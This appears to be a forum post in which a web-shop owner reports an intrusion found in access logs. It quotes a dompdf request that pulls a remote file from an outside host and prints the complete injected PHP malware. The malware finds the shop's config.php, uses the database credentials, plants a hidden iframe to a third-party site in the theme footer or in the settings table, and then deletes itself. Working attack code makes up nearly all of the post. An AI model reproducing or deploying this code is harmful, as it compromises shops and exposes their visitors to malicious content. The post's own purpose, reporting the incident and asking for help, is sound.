Inspecting my access logs revealed that a site had accessed my shop using the following URL:
/artshop/upload/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt
Here is the injected code:
Code: Select all
<?php
/*********************************************/
$INJ = '<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>';
/*********************************************/
error_reporting(0);
function findconfig($dir) {
if ($dh = opendir($dir)) {
while (($item = readdir($dh)) !== false) {
if($item != "." && $item != "..") {
if(is_file($dir . $item) && $item == 'config.php') {
@include $dir . $item;
if(defined('DB_HOSTNAME')) {
return $dir . $item;
}
}
}
}
closedir($dh);
return findconfig($dir . "../");
}
}
function halt($str) {
echo $str;
unlink('conf.php');
die;
}
if(!findconfig("./")) {
halt("<resp>[-] Could not find config.php</resp>");
}
if(!mysql_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD)) {
halt("<resp>[-] Could not connect to DB</resp>");
}
if(!mysql_select_db(DB_DATABASE)) {
halt("<resp>[-] Could not select DB</resp>");
}
$q = mysql_query("SELECT value FROM " . DB_PREFIX . "setting WHERE `key` = 'config_template' LIMIT 1");
$tpl = mysql_result($q, 0, "value");
if(!$tpl) {
$q = mysql_query("SELECT value FROM setting WHERE `key` = 'config_template' LIMIT 1");
$tpl = mysql_result($q, 0, "value");
if($tpl) {
define('PREFIX', '');
} else {
halt("<resp>[-] Could not retrieve theme</resp>");
}
} else {
define('PREFIX', DB_PREFIX);
}
$footer1 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/common/footer.tpl";
$footer2 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/template/common/footer.tpl";
if(file_exists($footer1)) {
$footer = $footer1;
} elseif(file_exists($footer2)) {
$footer = $footer2;
} else {
$footer = false;
}
if(!$footer || !is_writable($footer)) {
$q = mysql_query("SELECT `key` FROM " . PREFIX . "setting WHERE `key` = 'config_welcome_1' OR `key` = 'config_description_1' OR `key` = 'config_description_1' LIMIT 1");
$c = mysql_result($q, 0, "key");
$q = mysql_query("SELECT value FROM " . PREFIX . "setting WHERE `key` = '$c' LIMIT 1");
$v = mysql_result($q, 0, "value");
$r = mysql_query("UPDATE " . PREFIX . "setting SET value = '".addslashes($v . $INJ)."' WHERE `key` = '$c' LIMIT 1");
if($r) {
halt("<resp>[+] Injected! (db)</resp>");
} else {
halt("<resp>[-] Could not update db</resp>");
}
} else {
$fp = fopen($footer, 'a');
if($fp) {
fputs($fp, $INJ);
fclose($fp);
halt("<resp>[+] Injected! (file)</resp>");
} else {
halt("<resp>[-] Could not write to file</resp>");
}
}
unlink('conf.php');
die;Bryn
